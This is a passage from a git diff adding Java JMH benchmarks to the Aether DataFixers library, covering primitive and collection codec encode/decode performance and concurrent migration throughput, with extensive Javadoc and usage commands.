Measures the combined performance of encoding and decoding using + * {@link DataResult#flatMap} for monadic composition. This represents + * the functional programming style where operations are chained without + * explicit result unwrapping.

+ * + *

Comparing with {@link #roundTripStringListDirect} reveals the overhead + * (if any) of the functional API approach versus direct extraction.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void roundTripStringListFunctional(final Blackhole blackhole) { + final DataResult encoded = this.stringListCodec.encodeStart(this.ops, this.stringList); + final DataResult, JsonElement>> decoded = encoded.flatMap( + json -> this.stringListCodec.decode(this.ops, json) + ); + blackhole.consume(decoded); + } + + /** + * Benchmarks complete integer list round-trip using functional API. + * + *

Measures the combined performance of encoding and decoding using + * monadic composition via {@link DataResult#flatMap}.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void roundTripIntListFunctional(final Blackhole blackhole) { + final DataResult encoded = this.intListCodec.encodeStart(this.ops, this.intList); + final DataResult, JsonElement>> decoded = encoded.flatMap( + json -> this.intListCodec.decode(this.ops, json) + ); + blackhole.consume(decoded); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java new file mode 100644 index 0000000..7e9c8da --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/PrimitiveCodecBenchmark.java @@ -0,0 +1,467 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.codec; + +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.codec.Codecs; +import de.splatgames.aether.datafixers.api.result.DataResult; +import de.splatgames.aether.datafixers.api.util.Pair; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for primitive type codec encode/decode performance. + * + *

Measures the baseline performance of the fundamental codec operations for + * primitive Java types. These benchmarks establish the lower bound for codec + * performance and help identify overhead introduced by more complex codec + * compositions.

+ * + *

Benchmark Categories

+ * + *

Encode Benchmarks

+ *

Measure Java value to JSON element conversion:

+ *
    + *
  • {@link #encodeBool} - Boolean encoding
  • + *
  • {@link #encodeInt} - Integer encoding
  • + *
  • {@link #encodeLong} - Long encoding
  • + *
  • {@link #encodeFloat} - Float encoding
  • + *
  • {@link #encodeDouble} - Double encoding
  • + *
  • {@link #encodeString} - String encoding
  • + *
+ * + *

Decode Benchmarks

+ *

Measure JSON element to Java value conversion:

+ *
    + *
  • {@link #decodeBool} - Boolean decoding
  • + *
  • {@link #decodeInt} - Integer decoding
  • + *
  • {@link #decodeLong} - Long decoding
  • + *
  • {@link #decodeFloat} - Float decoding
  • + *
  • {@link #decodeDouble} - Double decoding
  • + *
  • {@link #decodeString} - String decoding
  • + *
+ * + *

Round-Trip Benchmarks

+ *

Measure complete encode-then-decode cycles:

+ *
    + *
  • {@link #roundTripIntDirect} - Integer round-trip with direct result extraction
  • + *
  • {@link #roundTripStringDirect} - String round-trip with direct result extraction
  • + *
+ * + *

Benchmark Configuration

+ * + * + * + * + * + * + * + *
SettingValue
Warmup5 iterations, 1 second each
Measurement10 iterations, 1 second each
Forks2 (for JIT variance mitigation)
JVM Heap2 GB min/max
Time UnitNanoseconds (for fine-grained primitive ops)
+ * + *

Test Values

+ * + * + * + * + * + * + * + * + *
TypeValueNotes
boolean{@code true}Single bit representation
int{@code 42}Small positive integer
long{@code 123456789L}Value exceeding int range representation
float{@code 3.14159f}Pi approximation (tests decimal handling)
double{@code 2.718281828}Euler's number (tests precision)
String{@code "benchmark-test-string"}21-character ASCII string
+ * + *

Interpreting Results

+ *
    + *
  • Encode vs Decode: Encoding typically allocates new JSON elements; decoding + * extracts values from existing elements. Similar performance is expected.
  • + *
  • Numeric types: All numeric types should have similar performance as they + * map directly to JSON number primitives.
  • + *
  • String codec: May show slightly different characteristics due to string + * interning and character encoding considerations.
  • + *
  • Round-trip overhead: Should be approximately encode + decode time plus + * minimal DataResult unwrapping overhead.
  • + *
+ * + *

Usage

+ *
{@code
+ * # Run all primitive codec benchmarks
+ * java -jar benchmarks.jar PrimitiveCodecBenchmark
+ *
+ * # Run only encode benchmarks
+ * java -jar benchmarks.jar "PrimitiveCodecBenchmark.encode.*"
+ *
+ * # Run only decode benchmarks
+ * java -jar benchmarks.jar "PrimitiveCodecBenchmark.decode.*"
+ *
+ * # Compare specific types
+ * java -jar benchmarks.jar "PrimitiveCodecBenchmark.*(Int|Long).*"
+ *
+ * # Quick validation run
+ * java -jar benchmarks.jar PrimitiveCodecBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Generate CSV for spreadsheet analysis
+ * java -jar benchmarks.jar PrimitiveCodecBenchmark -rf csv -rff primitive_results.csv
+ * }
+ * + * @author Erik Pförtner + * @see CollectionCodecBenchmark + * @see de.splatgames.aether.datafixers.api.codec.Codecs + * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.NANOSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class PrimitiveCodecBenchmark { + + /** + * Test boolean value for encoding benchmarks. + */ + private static final boolean TEST_BOOL = true; + + /** + * Test integer value for encoding benchmarks. + * + *

A small positive integer that fits in a single JSON number token.

+ */ + private static final int TEST_INT = 42; + + /** + * Test long value for encoding benchmarks. + * + *

A value that exceeds typical int range to test long-specific handling.

+ */ + private static final long TEST_LONG = 123456789L; + + /** + * Test float value for encoding benchmarks. + * + *

Pi approximation to test decimal point handling and precision.

+ */ + private static final float TEST_FLOAT = 3.14159f; + + /** + * Test double value for encoding benchmarks. + * + *

Euler's number with extended precision to test double encoding accuracy.

+ */ + private static final double TEST_DOUBLE = 2.718281828; + + /** + * Test string value for encoding benchmarks. + * + *

A 21-character ASCII string representing typical field values.

+ */ + private static final String TEST_STRING = "benchmark-test-string"; + + /** + * The DynamicOps implementation used for all codec operations. + * + *

GsonOps is used as the reference implementation for JSON format benchmarks.

+ */ + private GsonOps ops; + + /** + * Pre-encoded boolean JSON element for decode benchmarks. + */ + private JsonElement encodedBool; + + /** + * Pre-encoded integer JSON element for decode benchmarks. + */ + private JsonElement encodedInt; + + /** + * Pre-encoded long JSON element for decode benchmarks. + */ + private JsonElement encodedLong; + + /** + * Pre-encoded float JSON element for decode benchmarks. + */ + private JsonElement encodedFloat; + + /** + * Pre-encoded double JSON element for decode benchmarks. + */ + private JsonElement encodedDouble; + + /** + * Pre-encoded string JSON element for decode benchmarks. + */ + private JsonElement encodedString; + + /** + * Initializes pre-encoded JSON elements for decode benchmarks. + * + *

Pre-encoding ensures decode benchmarks measure only decoding performance + * without encoding overhead. All test values are encoded once at trial start.

+ */ + @Setup(Level.Trial) + public void setup() { + this.ops = GsonOps.INSTANCE; + + this.encodedBool = Codecs.BOOL.encodeStart(this.ops, TEST_BOOL).result().orElseThrow(); + this.encodedInt = Codecs.INT.encodeStart(this.ops, TEST_INT).result().orElseThrow(); + this.encodedLong = Codecs.LONG.encodeStart(this.ops, TEST_LONG).result().orElseThrow(); + this.encodedFloat = Codecs.FLOAT.encodeStart(this.ops, TEST_FLOAT).result().orElseThrow(); + this.encodedDouble = Codecs.DOUBLE.encodeStart(this.ops, TEST_DOUBLE).result().orElseThrow(); + this.encodedString = Codecs.STRING.encodeStart(this.ops, TEST_STRING).result().orElseThrow(); + } + + // ==================== Boolean Benchmarks ==================== + + /** + * Benchmarks boolean value encoding to JSON. + * + *

Measures the performance of converting a Java {@code boolean} to a + * JSON boolean element via {@link Codecs#BOOL}.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeBool(final Blackhole blackhole) { + final DataResult result = Codecs.BOOL.encodeStart(this.ops, TEST_BOOL); + blackhole.consume(result); + } + + /** + * Benchmarks boolean value decoding from JSON. + * + *

Measures the performance of extracting a Java {@code Boolean} from a + * pre-encoded JSON boolean element.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeBool(final Blackhole blackhole) { + final DataResult> result = Codecs.BOOL.decode(this.ops, this.encodedBool); + blackhole.consume(result); + } + + // ==================== Integer Benchmarks ==================== + + /** + * Benchmarks integer value encoding to JSON. + * + *

Measures the performance of converting a Java {@code int} to a + * JSON number element via {@link Codecs#INT}.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeInt(final Blackhole blackhole) { + final DataResult result = Codecs.INT.encodeStart(this.ops, TEST_INT); + blackhole.consume(result); + } + + /** + * Benchmarks integer value decoding from JSON. + * + *

Measures the performance of extracting a Java {@code Integer} from a + * pre-encoded JSON number element.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeInt(final Blackhole blackhole) { + final DataResult> result = Codecs.INT.decode(this.ops, this.encodedInt); + blackhole.consume(result); + } + + // ==================== Long Benchmarks ==================== + + /** + * Benchmarks long value encoding to JSON. + * + *

Measures the performance of converting a Java {@code long} to a + * JSON number element via {@link Codecs#LONG}.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeLong(final Blackhole blackhole) { + final DataResult result = Codecs.LONG.encodeStart(this.ops, TEST_LONG); + blackhole.consume(result); + } + + /** + * Benchmarks long value decoding from JSON. + * + *

Measures the performance of extracting a Java {@code Long} from a + * pre-encoded JSON number element.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeLong(final Blackhole blackhole) { + final DataResult> result = Codecs.LONG.decode(this.ops, this.encodedLong); + blackhole.consume(result); + } + + // ==================== Float Benchmarks ==================== + + /** + * Benchmarks float value encoding to JSON. + * + *

Measures the performance of converting a Java {@code float} to a + * JSON number element via {@link Codecs#FLOAT}. Float encoding involves + * decimal representation which may differ from integer encoding.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeFloat(final Blackhole blackhole) { + final DataResult result = Codecs.FLOAT.encodeStart(this.ops, TEST_FLOAT); + blackhole.consume(result); + } + + /** + * Benchmarks float value decoding from JSON. + * + *

Measures the performance of extracting a Java {@code Float} from a + * pre-encoded JSON number element. Decoding involves parsing the decimal + * representation back to IEEE 754 single-precision format.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeFloat(final Blackhole blackhole) { + final DataResult> result = Codecs.FLOAT.decode(this.ops, this.encodedFloat); + blackhole.consume(result); + } + + // ==================== Double Benchmarks ==================== + + /** + * Benchmarks double value encoding to JSON. + * + *

Measures the performance of converting a Java {@code double} to a + * JSON number element via {@link Codecs#DOUBLE}. Double encoding preserves + * higher precision than float but uses similar mechanisms.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeDouble(final Blackhole blackhole) { + final DataResult result = Codecs.DOUBLE.encodeStart(this.ops, TEST_DOUBLE); + blackhole.consume(result); + } + + /** + * Benchmarks double value decoding from JSON. + * + *

Measures the performance of extracting a Java {@code Double} from a + * pre-encoded JSON number element.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeDouble(final Blackhole blackhole) { + final DataResult> result = Codecs.DOUBLE.decode(this.ops, this.encodedDouble); + blackhole.consume(result); + } + + // ==================== String Benchmarks ==================== + + /** + * Benchmarks string value encoding to JSON. + * + *

Measures the performance of converting a Java {@code String} to a + * JSON string element via {@link Codecs#STRING}. String encoding may involve + * escape sequence handling for special characters.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void encodeString(final Blackhole blackhole) { + final DataResult result = Codecs.STRING.encodeStart(this.ops, TEST_STRING); + blackhole.consume(result); + } + + /** + * Benchmarks string value decoding from JSON. + * + *

Measures the performance of extracting a Java {@code String} from a + * pre-encoded JSON string element.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void decodeString(final Blackhole blackhole) { + final DataResult> result = Codecs.STRING.decode(this.ops, this.encodedString); + blackhole.consume(result); + } + + // ==================== Round-Trip Benchmarks ==================== + + /** + * Benchmarks complete integer round-trip (encode then decode). + * + *

Measures the combined performance of encoding a Java {@code int} to JSON + * and immediately decoding it back. Uses direct result extraction via + * {@code result().orElseThrow()} to measure the typical non-functional usage pattern.

+ * + *

Round-trip performance is important for scenarios where data is temporarily + * serialized (e.g., caching, IPC) and immediately deserialized.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void roundTripIntDirect(final Blackhole blackhole) { + final JsonElement json = Codecs.INT.encodeStart(this.ops, TEST_INT).result().orElseThrow(); + final Pair decoded = Codecs.INT.decode(this.ops, json).result().orElseThrow(); + blackhole.consume(decoded); + } + + /** + * Benchmarks complete string round-trip (encode then decode). + * + *

Measures the combined performance of encoding a Java {@code String} to JSON + * and immediately decoding it back. String round-trips may involve additional + * overhead from string object creation compared to primitive numeric types.

+ * + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + public void roundTripStringDirect(final Blackhole blackhole) { + final JsonElement json = Codecs.STRING.encodeStart(this.ops, TEST_STRING).result().orElseThrow(); + final Pair decoded = Codecs.STRING.decode(this.ops, json).result().orElseThrow(); + blackhole.consume(decoded); + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/package-info.java new file mode 100644 index 0000000..5720cfc --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/codec/package-info.java @@ -0,0 +1,163 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +/** + * Codec-focused JMH benchmarks for the Aether DataFixers framework. + * + *

This package contains benchmarks that measure the performance of codec operations, + * including encoding (Java objects to serialized format) and decoding (serialized format + * to Java objects). These benchmarks establish baseline performance for the codec system + * and help identify bottlenecks in serialization pipelines.

+ * + *

Benchmark Classes

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
ClassFocus AreaKey Metrics
{@link de.splatgames.aether.datafixers.benchmarks.codec.PrimitiveCodecBenchmark}Primitive type codecs (bool, int, long, float, double, string)Baseline encode/decode latency, round-trip overhead
{@link de.splatgames.aether.datafixers.benchmarks.codec.CollectionCodecBenchmark}Collection codecs (List<String>, List<Integer>)Scaling with collection size, functional vs direct API overhead
+ * + *

Why Codec Benchmarks?

+ *

Codecs are fundamental to the DataFixer system, transforming data between typed + * Java objects and format-agnostic {@link de.splatgames.aether.datafixers.api.dynamic.Dynamic} + * representations. Understanding codec performance is essential for:

+ *
    + *
  • Baseline establishment: Primitive codecs set the lower bound for all + * codec operations; complex codecs compose these primitives
  • + *
  • Bottleneck identification: Comparing encode vs decode reveals which + * direction is more expensive for a given type
  • + *
  • Scaling analysis: Collection benchmarks show how performance changes + * with data volume
  • + *
  • API comparison: Direct extraction vs functional composition may have + * different performance characteristics
  • + *
+ * + *

Running Codec Benchmarks

+ *
{@code
+ * # Run all codec benchmarks
+ * java -jar benchmarks.jar ".*codec.*"
+ *
+ * # Run only primitive codec benchmarks
+ * java -jar benchmarks.jar PrimitiveCodecBenchmark
+ *
+ * # Run only collection codec benchmarks
+ * java -jar benchmarks.jar CollectionCodecBenchmark
+ *
+ * # Run encode-only benchmarks across all codec types
+ * java -jar benchmarks.jar ".*codec.*encode.*"
+ *
+ * # Run decode-only benchmarks
+ * java -jar benchmarks.jar ".*codec.*decode.*"
+ *
+ * # Run round-trip benchmarks
+ * java -jar benchmarks.jar ".*codec.*roundTrip.*"
+ *
+ * # Quick validation with reduced iterations
+ * java -jar benchmarks.jar ".*codec.*" -wi 1 -i 1 -f 1
+ *
+ * # Generate CSV report for analysis
+ * java -jar benchmarks.jar ".*codec.*" -rf csv -rff codec_results.csv
+ * }
+ * + *

Benchmark Design Principles

+ *
    + *
  • Isolated operations: Encode and decode are benchmarked separately to + * identify which direction is more expensive
  • + *
  • Pre-encoded data: Decode benchmarks use pre-encoded JSON elements + * created during setup to avoid measuring encoding overhead
  • + *
  • Parameterization: Collection sizes are parameterized to reveal + * scaling characteristics
  • + *
  • API styles: Both direct extraction ({@code result().orElseThrow()}) + * and functional composition ({@code flatMap}) are benchmarked for round-trips
  • + *
  • Time units: Nanoseconds for primitives (sub-microsecond operations), + * microseconds for collections (longer operations)
  • + *
+ * + *

Interpreting Codec Results

+ * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + *
ObservationMeaningAction
Encode slower than decodeJSON element construction more expensive than extractionConsider caching encoded results if reused
Decode slower than encodeType parsing/validation overhead dominatesReview type conversion logic
Super-linear collection scalingGC pressure or algorithmic inefficiencyProfile memory allocation; consider streaming
Functional API slower than directLambda/closure overhead measurableUse direct extraction for hot paths
String codec slower than numericString allocation/interning overheadExpected; no action needed
+ * + *

Relationship to Other Benchmarks

+ *

Codec benchmarks complement other benchmark packages:

+ *
    + *
  • {@link de.splatgames.aether.datafixers.benchmarks.core core} - Uses codecs + * internally; codec performance affects fix application time
  • + *
  • {@link de.splatgames.aether.datafixers.benchmarks.concurrent concurrent} - + * Codec thread-safety is assumed; concurrent benchmarks validate this assumption
  • + *
+ * + *

Supported Serialization Formats

+ *

These benchmarks use {@link de.splatgames.aether.datafixers.codec.json.gson.GsonOps} + * as the reference DynamicOps implementation. The codec system supports multiple formats:

+ *
    + *
  • JSON: GsonOps, JacksonJsonOps
  • + *
  • YAML: SnakeYamlOps, JacksonYamlOps
  • + *
  • TOML: JacksonTomlOps
  • + *
  • XML: JacksonXmlOps
  • + *
+ *

Future benchmarks may compare performance across different DynamicOps implementations.

+ * + * @see de.splatgames.aether.datafixers.benchmarks.codec.PrimitiveCodecBenchmark + * @see de.splatgames.aether.datafixers.benchmarks.codec.CollectionCodecBenchmark + * @see de.splatgames.aether.datafixers.api.codec.Codec + * @see de.splatgames.aether.datafixers.api.codec.Codecs + * @see de.splatgames.aether.datafixers.codec.json.gson.GsonOps + * @since 1.0.0 + */ +package de.splatgames.aether.datafixers.benchmarks.codec; diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java new file mode 100644 index 0000000..a1830bf --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/concurrent/ConcurrentMigrationBenchmark.java @@ -0,0 +1,601 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.concurrent; + +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.api.schema.Schema; +import de.splatgames.aether.datafixers.api.schema.SchemaRegistry; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkBootstrap; +import de.splatgames.aether.datafixers.benchmarks.util.BenchmarkDataGenerator; +import de.splatgames.aether.datafixers.benchmarks.util.PayloadSize; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import de.splatgames.aether.datafixers.core.schema.SimpleSchemaRegistry; +import de.splatgames.aether.datafixers.testkit.factory.MockSchemas; +import org.openjdk.jmh.annotations.Benchmark; +import org.openjdk.jmh.annotations.BenchmarkMode; +import org.openjdk.jmh.annotations.Fork; +import org.openjdk.jmh.annotations.Level; +import org.openjdk.jmh.annotations.Measurement; +import org.openjdk.jmh.annotations.Mode; +import org.openjdk.jmh.annotations.OutputTimeUnit; +import org.openjdk.jmh.annotations.Param; +import org.openjdk.jmh.annotations.Scope; +import org.openjdk.jmh.annotations.Setup; +import org.openjdk.jmh.annotations.State; +import org.openjdk.jmh.annotations.Threads; +import org.openjdk.jmh.annotations.Warmup; +import org.openjdk.jmh.infra.Blackhole; + +import java.util.SplittableRandom; +import java.util.concurrent.TimeUnit; + +/** + * JMH benchmark for concurrent DataFixer operations and thread-safety validation. + * + *

This benchmark measures the performance characteristics of the DataFixer system + * under concurrent load. It validates thread-safety of shared components and quantifies + * scalability across different thread counts. The results help identify contention + * points and ensure the framework performs well in multi-threaded environments.

+ * + *

Benchmark Categories

+ * + *

Concurrent Migration Benchmarks

+ *

Measure DataFixer performance when multiple threads perform migrations simultaneously:

+ *
    + *
  • {@link #concurrentSingleFix} - Maximum parallelism with single-fix migrations
  • + *
  • {@link #concurrentChainMigration} - Maximum parallelism with 10-fix chain migrations
  • + *
  • {@link #fourThreadMigration} - Fixed 4-thread migration for baseline comparison
  • + *
  • {@link #eightThreadMigration} - Fixed 8-thread migration for scaling analysis
  • + *
+ * + *

Concurrent Registry Access Benchmarks

+ *

Measure SchemaRegistry performance under concurrent read pressure:

+ *
    + *
  • {@link #concurrentRegistryLookup} - Random version lookups from multiple threads
  • + *
  • {@link #concurrentLatestLookup} - Latest schema lookups (hot path optimization)
  • + *
+ * + *

Thread Configuration

+ * + * + * + * + * + * + * + * + *
BenchmarkThreadsPurpose
concurrentSingleFixMAX (all available)Maximum contention stress test
concurrentChainMigrationMAXChain migration under full load
fourThreadMigration4Typical server scenario baseline
eightThreadMigration8Higher parallelism scaling point
concurrentRegistryLookupMAXRegistry contention stress test
concurrentLatestLookupMAXHot path contention analysis
+ * + *

Parameters

+ * + * + * + *
ParameterValuesDescription
payloadSizeSMALL, MEDIUMInput data complexity per thread
+ * + *

Benchmark Configuration

+ * + * + * + * + * + * + * + *
SettingValue
Warmup3 iterations, 2 seconds each
Measurement5 iterations, 2 seconds each
Forks2 (for JIT variance mitigation)
JVM Heap2 GB min/max
Time UnitMicroseconds
+ * + *

State Management

+ *

This benchmark uses two JMH state classes to properly isolate shared and + * thread-local data:

+ *
    + *
  • {@link BenchmarkState} (Scope.Benchmark) - Shared across all threads: DataFixer + * instances, SchemaRegistry, and version constants
  • + *
  • {@link ThreadState} (Scope.Thread) - Per-thread isolation: input data, RNG, + * and pre-computed random indices to avoid contention
  • + *
+ * + *

Interpreting Results

+ *
    + *
  • Linear throughput scaling: Ideal - throughput increases proportionally with thread count
  • + *
  • Sub-linear scaling: Expected due to shared resource contention (cache lines, locks)
  • + *
  • Throughput plateau: Indicates saturation point; adding threads provides no benefit
  • + *
  • Throughput degradation: Severe contention; may indicate lock contention or false sharing
  • + *
  • High variance (±): May indicate GC pauses, lock contention, or scheduler interference
  • + *
+ * + *

Usage

+ *
{@code
+ * # Run all concurrent benchmarks
+ * java -jar benchmarks.jar ".*concurrent.*"
+ *
+ * # Run with specific thread count override
+ * java -jar benchmarks.jar ConcurrentMigrationBenchmark -t 16
+ *
+ * # Run registry-only benchmarks
+ * java -jar benchmarks.jar ".*concurrent.*Lookup.*"
+ *
+ * # Quick validation run
+ * java -jar benchmarks.jar ConcurrentMigrationBenchmark -wi 1 -i 1 -f 1
+ *
+ * # Generate JSON report for analysis
+ * java -jar benchmarks.jar ConcurrentMigrationBenchmark -rf json -rff concurrent_results.json
+ *
+ * # Profile with async-profiler integration
+ * java -jar benchmarks.jar ConcurrentMigrationBenchmark -prof async:output=flamegraph
+ * }
+ * + * @author Erik Pförtner + * @see de.splatgames.aether.datafixers.benchmarks.core.SingleFixBenchmark + * @see de.splatgames.aether.datafixers.benchmarks.core.MultiFixChainBenchmark + * @see BenchmarkBootstrap + * @since 1.0.0 + */ +@BenchmarkMode({Mode.Throughput, Mode.AverageTime}) +@OutputTimeUnit(TimeUnit.MICROSECONDS) +@State(Scope.Benchmark) +@Warmup(iterations = 3, time = 2, timeUnit = TimeUnit.SECONDS) +@Measurement(iterations = 5, time = 2, timeUnit = TimeUnit.SECONDS) +@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"}) +public class ConcurrentMigrationBenchmark { + + // ==================== Concurrent Migration Benchmarks ==================== + + /** + * Benchmarks concurrent single-fix migrations with maximum thread parallelism. + * + *

All available CPU threads simultaneously apply a single DataFix to their + * respective input data. This benchmark stress-tests the thread-safety of the + * DataFixer implementation and measures maximum achievable throughput.

+ * + *

Key aspects measured:

+ *
    + *
  • Lock contention in shared DataFixer instance
  • + *
  • Memory allocation pressure under concurrent load
  • + *
  • Cache coherency effects from shared schema access
  • + *
+ * + * @param s shared benchmark state containing the DataFixer and versions + * @param t per-thread state containing isolated input data + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + @Threads(Threads.MAX) + public void concurrentSingleFix(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final Dynamic result = s.sharedFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + t.threadInput, + s.fromVersion, + s.toVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks concurrent chain migrations with maximum thread parallelism. + * + *

All available CPU threads simultaneously apply a 10-fix chain migration. + * This benchmark combines the stress of concurrent access with the complexity + * of multi-step migrations, revealing performance characteristics under + * realistic high-load scenarios.

+ * + *

Compared to {@link #concurrentSingleFix}, this benchmark:

+ *
    + *
  • Increases per-operation duration, potentially reducing contention
  • + *
  • Exercises fix ordering and version traversal logic concurrently
  • + *
  • Creates higher memory allocation rates per thread
  • + *
+ * + * @param s shared benchmark state containing the chain DataFixer + * @param t per-thread state containing isolated input data + * @param blackhole JMH blackhole to prevent dead code elimination + */ + @Benchmark + @Threads(Threads.MAX) + public void concurrentChainMigration(final BenchmarkState s, + final ThreadState t, + final Blackhole blackhole) { + final Dynamic result = s.sharedChainFixer.update( + BenchmarkBootstrap.BENCHMARK_TYPE, + t.threadInput, + s.fromVersion, + s.chainToVersion + ); + blackhole.consume(result); + } + + /** + * Benchmarks migration performance with exactly 4 concurrent threads. + * + *

